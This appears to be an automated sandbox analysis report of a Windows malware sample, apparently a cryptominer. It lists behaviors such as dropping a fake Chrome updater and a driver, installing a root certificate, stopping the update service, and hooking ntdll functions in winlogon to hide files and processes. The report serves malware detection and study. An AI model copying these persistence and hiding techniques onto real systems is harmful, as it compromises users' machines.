Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: wbemcomn.dll

Source: C:\Windows\System32\dialer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: hiwA7Blv7C.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: hiwA7Blv7C.exe

Static file information: File size 5925152 > 1048576

Source: hiwA7Blv7C.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x59b200

Source: hiwA7Blv7C.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp

Source: updater.exe.0.dr	Static PE information: real checksum: 0x5aec8c should be: 0x5aff8f
Source: bzqlyietdwsj.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x316d6
Source: hiwA7Blv7C.exe	Static PE information: real checksum: 0x5aec8c should be: 0x5aff8f
Source: bzqlyietdwsj.tmp.26.dr	Static PE information: real checksum: 0x0 should be: 0x564f65

Source: hiwA7Blv7C.exe	Static PE information: section name: .xdata
Source: updater.exe.0.dr	Static PE information: section name: .xdata
Source: bzqlyietdwsj.tmp.26.dr	Static PE information: section name: _RANDOMX
Source: bzqlyietdwsj.tmp.26.dr	Static PE information: section name: _TEXT_CN
Source: bzqlyietdwsj.tmp.26.dr	Static PE information: section name: _TEXT_CN
Source: bzqlyietdwsj.tmp.26.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D01659ACDD push rcx; retf 003Fh	23_2_000002D01659ACDE
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165FC6DD push rcx; retf 003Fh	23_2_000002D0165FC6DE
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D01662ACDD push rcx; retf 003Fh	23_2_000002D01662ACDE
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F14FACDD push rcx; retf 003Fh	27_2_000002D6F14FACDE
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F152C6DD push rcx; retf 003Fh	27_2_000002D6F152C6DE
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F158C6DD push rcx; retf 003Fh	27_2_000002D6F158C6DE
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FBACDD push rcx; retf 003Fh	30_2_0000014E41FBACDE
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FEC6DD push rcx; retf 003Fh	30_2_0000014E41FEC6DE
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B06ACDD push rcx; retf 003Fh	31_2_000001D15B06ACDE
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B09C6DD push rcx; retf 003Fh	31_2_000001D15B09C6DE
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32CACDD push rcx; retf 003Fh	46_2_0000023AF32CACDE
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD7ACDD push rcx; retf 003Fh	50_2_0000023C9FD7ACDE
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FDAC6DD push rcx; retf 003Fh	50_2_0000023C9FDAC6DE
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA6FACDD push rcx; retf 003Fh	51_2_000001A1CA6FACDE
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA72C6DD push rcx; retf 003Fh	51_2_000001A1CA72C6DE
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246ED7CACDD push rcx; retf 003Fh	53_2_00000246ED7CACDE
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE7C6DD push rcx; retf 003Fh	53_2_00000246EDE7C6DE
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19CC6DD push rcx; retf 003Fh	54_2_00000200A19CC6DE
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_000002259669C6DD push rcx; retf 003Fh	55_2_000002259669C6DE

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Windows\TEMP\libtqlibdoyd.sys

Jump to behavior

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	File created: C:\Program Files\Google\Chrome\updater.exe	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\bzqlyietdwsj.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	File created: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\libtqlibdoyd.sys	Jump to dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\bzqlyietdwsj.tmp			Jump to dropped file
Source: C:\Program Files\Google\Chrome\updater.exe	File created: C:\Windows\Temp\libtqlibdoyd.sys			Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BZQLYIETDWSJ.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\BZQLYIETDWSJ.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\BZQLYIETDWSJ.TMP
Source: C:\Program Files\Google\Chrome\updater.exe	Module Loaded: C:\WINDOWS\TEMP\BZQLYIETDWSJ.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: winlogon.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
